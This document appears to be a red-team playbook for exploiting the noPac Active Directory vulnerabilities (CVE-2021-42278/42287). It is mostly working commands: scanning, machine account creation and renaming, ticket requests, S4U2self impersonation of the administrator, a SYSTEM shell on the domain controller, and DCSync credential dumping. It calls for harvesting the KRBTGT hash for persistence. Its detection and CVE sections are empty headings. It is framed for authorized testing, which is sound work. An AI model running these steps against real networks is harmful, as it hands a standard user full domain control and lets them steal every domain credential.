Exploiting Nopac Cve 2021 42278 42287

• When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
• When analyzing malware samples or attack artifacts in a controlled environment
• When conducting red team exercises or penetration testing engagements
• When building detection capabilities based on offensive technique understanding

Prerequisites

• Familiarity with red teaming concepts and tools
• Access to a test or lab environment for safe execution
• Python 3.8+ with required dependencies installed
• Appropriate authorization for any testing activities

Objectives

• Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
• Create or leverage a machine account with modified sAMAccountName
• Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
• Use the DC ticket to perform DCSync and dump domain credentials
• Achieve Domain Admin access from a standard domain user account
• Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

• T1068 - Exploitation for Privilege Escalation
• T1136.002 - Create Account: Domain Account
• T1078.002 - Valid Accounts: Domain Accounts
• T1558 - Steal or Forge Kerberos Tickets
• T1003.006 - OS Credential Dumping: DCSync

Workflow

Phase 1: Vulnerability Scanning

1. Check if the domain is vulnerable using the noPac scanner:

   # Using cube0x0's noPac scanner
   python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1
   
   # Using CrackMapExec module
   crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
   

2. Verify the MachineAccountQuota (default is 10, allows any user to join computers):

   # Check MachineAccountQuota via LDAP
   python3 -c "
   import ldap3
   server = ldap3.Server('10.10.10.1')
   conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
   conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
   print(conn.entries[0]['ms-DS-MachineAccountQuota'])
   "
   

Phase 2: Exploitation with noPac Tool

1. Run the full noPac exploit chain:

   # Using cube0x0's noPac (gets a shell on the DC)
   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     -dc-host DC01 -shell --impersonate administrator -use-ldap
   
   # Using Ridter's noPac (alternative implementation)
   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     --impersonate administrator -dump
   

2. The exploit automatically:
   • Creates a new machine account (or uses an existing one)
   • Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
   • Requests a TGT for the spoofed account name
   • Restores the original sAMAccountName
   • Uses S4U2self to obtain a service ticket impersonating the target user
   • The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

1. With the obtained Domain Controller ticket, perform DCSync:

   # DCSync using secretsdump.py with the Kerberos ticket
   export KRB5CCNAME=administrator.ccache
   secretsdump.py -k -no-pass domain.local/[email protected]
   
   # Or directly through the noPac shell
   # The shell runs as SYSTEM on the DC
   

2. Alternatively, obtain a semi-interactive shell:

   python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
     -dc-host DC01 -shell --impersonate administrator -use-ldap
   

Phase 4: Manual Exploitation Steps

1. Create a machine account:

   addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   

2. Clear the SPN and rename sAMAccountName:

   # Rename machine account sAMAccountName to DC name (without $)
   renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   

3. Request a TGT for the spoofed name:

   getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
   

4. Restore the original machine name:

   renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
     -dc-ip 10.10.10.1 domain.local/user:'Password123'
   

5. Use S4U2self for impersonation:

   export KRB5CCNAME=DC01.ccache
   getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
     -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'
   

Tools and Resources

CVE Details

Detection Signatures

Validation Criteria

• Domain scanned for noPac vulnerability
• MachineAccountQuota verified (default 10)
• Exploit executed successfully (shell or DCSync)
• Domain Admin privileges obtained from standard user
• DCSync performed to dump domain credentials
• KRBTGT hash obtained for persistence validation
• Attack chain documented with timestamps
• Patch status verified (KB5008380, KB5008602)